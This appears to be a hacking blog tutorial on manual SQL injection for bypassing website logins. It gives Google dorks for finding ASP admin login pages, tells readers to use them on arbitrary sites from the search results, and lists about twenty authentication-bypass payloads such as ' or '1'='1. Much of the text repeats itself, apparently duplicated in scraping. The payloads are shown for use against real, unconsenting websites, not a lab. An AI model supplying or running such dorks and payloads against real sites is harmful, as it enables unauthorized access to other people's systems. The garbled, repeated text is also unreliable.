Hey guys its have been a long time since we have written any article Sorry for that :/ . I am going to start a series of Tutorials based on Manual SQL injection.
You might have been seen many tools for SQL injection like Havij, SQLmap, darkMYSQLi,etc...
But if want to create your tool you need to learn Manual SQLi.
This tutorial is based on basics of SQLi. I will be teaching you How to bypass Login Using SQL injection..?
Database : In simple words database means a collection of data stored in a systematic manner.
Eg: MYSQL,MSSQL, Ms-Access, Postgresql, Oracle,etc.
According to OWASP SQLi is the mostly responsible for defacement of the websites.
SELECT * FROM USER
WHERE ID= $_GET ['USER NAME']
AND PASS= $_GET ['PASSWORD'];
and as you enter your login detail as follows
ID = admin || PASS = password the query becomes.
SELECT * FROM USER
WHERE ID= admin
AND PASS= password;
Finding Vulnerable site :
So here come's Google Dorks handy. So here are some Google dorks. I will be surely writing an article explaining how to use Google Dorks.
You will see something like this.
Let's do some injection :
Now type anything in the User and Password field and click on login. What happened ...?
Ohh shit I didn't got access.
Now lets give the Admin panel a Injection of our SQLi.
In the User and Password field type ' or '1'='1 and click on login. Yeah we got access to the Admin panel.
So how does this works...?
This query will search for 1 in the database but no matter's 1 will be always equal to 1.
And you will be logged in.
Here are some more SQL queries.
You might have been seen many tools for SQL injection like Havij, SQLmap, darkMYSQLi,etc...
But if want to create your tool you need to learn Manual SQLi.
This tutorial is based on basics of SQLi. I will be teaching you How to bypass Login Using SQL injection..?
Short introduction about SQLSQL stand for Structured Query Language. SQL is used to communicate with the SQL database in the from of queries.
Database : In simple words database means a collection of data stored in a systematic manner.
Eg: MYSQL,MSSQL, Ms-Access, Postgresql, Oracle,etc.
SQL injectionSQL injection is the technique used to gain un-authorised access to the SQL database of the victim server and dig all the sensitive information of the server.
According to OWASP SQLi is the mostly responsible for defacement of the websites.
How does a simple login system Works..?When ever you login to any simple site the login query looks something like this.
SELECT * FROM USER
WHERE ID= $_GET ['USER NAME']
AND PASS= $_GET ['PASSWORD'];
and as you enter your login detail as follows
ID = admin || PASS = password the query becomes.
SELECT * FROM USER
WHERE ID= admin
AND PASS= password;
Bypassing Login AccessSo we know how the login system works so lets hack them :D.
Finding Vulnerable site :
So here come's Google Dorks handy. So here are some Google dorks. I will be surely writing an article explaining how to use Google Dorks.
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administratorlogin.asp
inurl:login/administrator.asp
inurl:administrator_login.asp
Just paste this codes/dorks at Google search bar and click on any site in the search result.
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administratorlogin.asp
inurl:login/administrator.asp
inurl:administrator_login.asp
You will see something like this.
Let's do some injection :
Now type anything in the User and Password field and click on login. What happened ...?
Ohh shit I didn't got access.
Now lets give the Admin panel a Injection of our SQLi.
In the User and Password field type ' or '1'='1 and click on login. Yeah we got access to the Admin panel.
So how does this works...?
This query will search for 1 in the database but no matter's 1 will be always equal to 1.
And you will be logged in.
Here are some more SQL queries.
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
If you have any problem just ask in comments.
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
Sign up here with your email
ConversionConversion EmoticonEmoticon